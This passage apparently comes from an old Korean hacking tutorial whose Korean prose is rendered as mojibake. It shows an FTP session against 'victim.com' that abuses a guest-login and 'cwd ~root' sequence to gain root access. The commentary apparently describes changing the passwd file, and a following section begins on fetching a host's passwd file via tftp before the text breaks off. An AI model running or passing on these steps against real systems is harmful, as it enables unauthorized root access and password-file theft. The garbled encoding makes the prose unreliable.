º»¹®/³»¿ë
evil % ftp -n
ftp> open victim.com
connected to victim.com
220 victim.com FTP server ready.
ftp> quote user ftp
331 Guest login ok, send ident as password.
ftp> quote cwd ~root
530 Please login with USER and PASS.
ftp> quote pass ftp
230 Guest login ok, access restriction apply.
ftp> ls -al / (or whatever)
¸¸¾à¿¡ À§ÀÇ ¹æ¹ýÀÌ ¼º°øµÇ¾ú´Ù¸é, ´ç½ÅÀº ftp¿¡ rootÀÇ ±ÇÇÑÀ¸·Î loginµÈ °ÍÀÌ´Ù. ´ç½ÅÀº ftpÀÇ ¸ðµç ±â´ÉÀ» Ȱ¿ëÇØ passwdÆÄ ÀÏÀ» ¹Ù²Ù°Å³ª ´ç½ÅÀÌ ¿øÇÏ´Â ¸ðµçÀÏÀ» ÇÒ ¼ö ÀÖ´Ù.
ÀÌÁ¦´Â ÀÌ·± ¹ö±×¸¦ °¡Áø ½Ã½ºÅÛÀÌ ¾ø°ÚÁö¸¸ ¾ÆÁ÷µµ ÀÖ´Ù¸é ºÎµð °¢¼º¹Ù¶õ´Ù.
--------------------------------------------------------------------------------
5. tftp·Î »ó´ë È£½ºÆ®ÀÇ passwdÆÄÀÏ °¡Á®¿À±â
ftp¿Í ºñ½ÁÇÑ ÇÁ·Î±×·¥À¸·Î tft³ª ±âŸ ±âº»ÀûÀÎ ±â´ÉÀ» °¡Áø ÆÄÀÏÀü¼Û ÇÁ·Î±×·¥ÀÌ ÀÖ´Ù. ÀÌ µ¥¸óÀº È®ÀÎÀ» À§ÇØ ºñ¹Ð¹øÈ£¸¦ ¿ä±¸ÇÏÁö ¾Ê´Â´Ù. ¸¸¾à¿¡ ±× ½Ã½ºÅÛ¿¡¼ Ưº°È÷ Á¢±Ù±ÇÇÑÀ» Á¦ÇÑÇÏÁö ¾Ê¾Ò´Ù¸é ´ç½ÅÀº ±× ½Ã½ºÅÛ¿¡ Àаųª ¾²¡¦(»ý·«)